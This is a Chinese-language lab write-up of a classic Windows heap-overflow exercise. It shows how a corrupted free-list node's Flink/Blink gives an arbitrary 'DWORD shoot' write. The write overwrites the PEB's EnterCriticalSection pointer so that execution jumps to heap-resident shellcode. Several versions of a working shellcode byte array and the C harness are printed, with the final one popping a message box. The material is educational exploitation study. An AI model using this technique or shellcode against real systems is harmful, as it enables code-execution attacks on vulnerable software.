总结:在链表卸下时, 假造的node的FLink的值将写入到BLink的地址处(Flink = Forward前 link ,指向高地址; BLink = Behind 后 Link,指向低地址)
代码:
- HANDLE hp;
- HLOCAL h1,h2,h3,h4,h5,h6;
- // 堆空表卸载时的dword shoot
- //1 断点
- __asm int 3
- hp = HeapCreate(0,0x1000,0x10000); // 创建新的堆,不可扩展的堆 只存在空表
-
- //2 申请6个8 字节的堆内存
- h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
- h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
- h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
-
- h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
- h5 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
- h6 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
- //3 释放1 3 5 这时 空表第3项 即 free[2] 上会有3个彼此相连的node (申请的8字节 在加上头信息共16字节所以16/8 = 2,连入 free[2] )
- HeapFree(hp,0,h1);
- HeapFree(hp,0,h3);
- HeapFree(hp,0,h5);
- //4 这时候 h5 是free[2] 最后一项,如果再分配8字节的堆内存,会将h5卸下来,这时就存在dowrd shoot,执行到这步停下来,修改h5的值
-
-
-
-
- //5 sheng qing 8 byte new dui -> dword shoot
- h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
-
-
注意一定要replease模式生成,然后运行,od调试
<ignore_js_op>![]()
首先自己找到 这个指针
- __asm
- {
- xor eax,eax
- mov eax,fs:[eax+0x30] //peb
- lea eax,[eax+0x20] //EnterCriticalSectionPointer
- mov eax,[eax] //EnterCriticalSection addr 这个是这个函数的地址
-
- }
<ignore_js_op>![]()
EnterCriticalSectionPointer 0x7ffdf020
- char shellcode[] = //this my shellcode msg ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060
- "\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\xF0\xFD\x7F\xBB\x60\x20\xF8\x77\x89\x18"\
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
- "\x90\x90\x90"\
- "\x16\x01\x1A\x00\x00\x10\x00\x00"\
- "\x88\x06\x36\x00\x20\xF0\xFD\x7F"; //20 nop
- //"\x90\x90\x90\x90\x90\x90\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x90\x90\x90\x90"; //20 nop
-
-
-
- HLOCAL h1=0,h2=0;
- HANDLE hp;
- hp = HeapCreate(0,0x1000,0x10000);
-
- h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,208); // 208 因为我的msg len 长啦!调试需要
- memcpy(h1,shellcode,0x200); //0x200 = 512
-
- h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
-
原理
<ignore_js_op>![]()
首先我们来定位
shllcode 修改为
- char shellcode[] = //this my shellcode MSG ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060
-
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x90\x90\x90\x90"; //20 nop
- //209 216
- // 181 +20 + 8 + 20
<ignore_js_op>![]()
比较上一图 我们发现 红色部分被我们的 91 -98 控制啦 那么91 -98 就是我们 修改的关键
如果修改呢 根据F =》B的原理 我们把 91-94不知为我们shellcode 地址 也就是 h1地址 360688
将 B 部分 95 -98 为 EnterCriticalSectionPointer 7FFDF020
- char shellcode[] = //this my shellcode MSG ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060
-
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x88\x06\x36\x00\x20\xF0\xFD\x7F\x99\x90\x90\x90\x90"; //20 nop
- //209 91 92 93 94 95 96 97 98
- // 181 +20 + 8 + 20
-
<ignore_js_op>![]()
我们已经控制啦
调试发现会存在 书中所说的 2次 dword shoot 造成我们的shllcode偏移 4字节处被污染!
我们将shellcode头部填充20 nop 验证下
- char shellcode[] = //this my shellcode MSG ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
-
- "\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x88\x06\x36\x00\x20\xF0\xFD\x7F\x99\x90\x90\x90\x90"; //20 nop
- //209 91 92 93 94 95 96 97 98
- // 181 +20 + 8 + 20
将 下面的20 个 nop提到头部
<ignore_js_op>![]()
还好 无关紧要
接下来解决问题,恢复被我们修改的EnterCriticalSectionPointer
__asm
{
xor eax,eax
mov eax,fs:[eax+0x30] //peb
lea eax,[eax+0x20]
mov eax,[eax] //这就是 EnterCriticalSection 地址啦 77F82060 (徐调试)
}
这实验 我就不做啦
以下code是修复 的代码
- char shellcode[] = //this my shellcode MSG ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060 |mov[eax],ebx
- "\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\xF0\xFD\x7F\xBB\x60\x20\xF8\x77\x89\x18"\
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
-
- "\x90\x90\x90\x90\x90\x90\x90\x90"\
- "\x90\x90\x90\x90\x90\x90\x90\x88\x06\x36\x00\x20\xF0\xFD\x7F\x99\x90\x90\x90\x90"; //20 nop
- //209 91 92 93 94 95 96 97 98
- // 181 +20 + 8 + 20
-
到现在 还没有成功!
接下来就是修复下 尾块的头 现在尾块被我们的数据覆盖为啦90909090当然不对,所以异常
直接copy没被破坏的头结构
00360758 15 01 1B 00 00 10 00 00
先试试这个吧
修改啦还是不行 可能 还是2次 dowrd shoot 的脏数据问题
但是据说 那几句代码 可以忽略
为了保险 在产生脏数据的后面放4个 nop
最后的
- //2 stack overflow
- char shellcode[] = //this my shellcode MSG ; Len is 181
- // 1 2 3 4 x x x x |mov eax,0x7FFDF020| mov ebx,77F82060 |mov[eax],ebx
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\xF0\xFD\x7F\xBB\x60\x20\xF8\x77\x89\x18"\
- "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
- "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
- "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
- "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
- "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
- "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
- "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
- "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
- "\xFC\x53\xFF\x57\xF8"\
-
- "\x90\x90\x90\x15"\
- "\x01\x1b\x00\x00\x10\x00\x00\x88\x06\x36\x00\x20\xF0\xFD\x7F\x99\x90\x90\x90\x90"; //20 nop
- //209 91 92 93 94 95 96 97 98
- // 181 +20 + 8 + 20
去掉int 3 直接运行
当当当 msg 出来啦
<ignore_js_op>![]()
|